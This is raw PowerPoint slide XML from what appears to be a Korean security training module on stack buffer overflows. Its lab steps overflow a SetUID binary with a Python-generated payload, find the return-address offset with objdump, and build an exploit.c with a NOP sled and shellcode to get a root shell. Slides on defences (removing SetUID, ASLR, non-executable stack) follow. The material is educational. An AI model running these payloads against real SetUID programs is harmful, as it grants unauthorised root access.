                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="900" kern="0" spc="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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>확인을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>계정으로 변경</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> test </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>5) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>스택 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 취약점 이용 공격 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ /sec/bof64 $(python -c 'print "A"*24+"\x35\x06\x40")</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/etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 내용 출력이 되지 않음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>루트 계정으로 복귀</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ exit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 실행</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쉘 코드가 포함된 페이로드를 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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="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/sec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>디렉터리로 이동</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ cd /sec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2) /sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정되어 있음을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ls –l stack</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/sec/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stack.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>stack.c</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>bof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>함수 사용으로 인한 버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>오버플로우</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 취약점이 존재함을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ojdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 사용하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>disassemble</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>    $ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -M intel -d stack | more</a:t>
            </a:r>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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>버퍼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>시작으로부터</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 복귀 주소 시작까지의 거리는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>28</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(24 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>소스 파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ vi exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>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6) /sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>빌드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> -o exploit exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.c</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7) /sec/exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 이용한 페이로드 제작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./exploit 28</a:t>
            </a:r>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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>NOP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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 0x90, 517); // </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="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a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 28</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>에 복귀 주소가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:effectLst/>
                        </a:rPr>
                        <a:t>복귀 주소는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>buffer </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>버퍼 시작 주소 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>+ 32</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>가 저장된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:effectLst/>
                        </a:rPr>
                        <a:t>즉</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>다음과 같은 페이로드가 준비된다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t> ((long *) (buffer + off)) = (long) (buffer +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a:effectLst/>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8) /sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 실행하여 루트 쉘 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>$ ./stack </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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a:effectLst/>
                        </a:rPr>
                        <a:t>마지막으로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>쉘코드를</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> 페이로드 마지막 부분에 복사해 넣는다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="100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 - sizeof (shellcode), shellcode, sizeof (shellcode))</a:t>
                      </a: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a:t>1) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>루트 쉘을 획득한 상태에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># acheck</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 9. BOF - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>쉘코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> 실행 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>대응</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> -w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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>va_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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="950" kern="0" spc="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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="95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/sec/stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>가 설정됨을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /sec/stack*</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stack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>SetUID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정 해제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> u-s /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ls –l /sec/stack*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ASLR </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>활성화</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>sysctl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –w kernel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>randomize_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>va_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>space=2</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>스택 실행 방지 설정 및 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># execstack –c /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># execstack –q /sec/stack</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
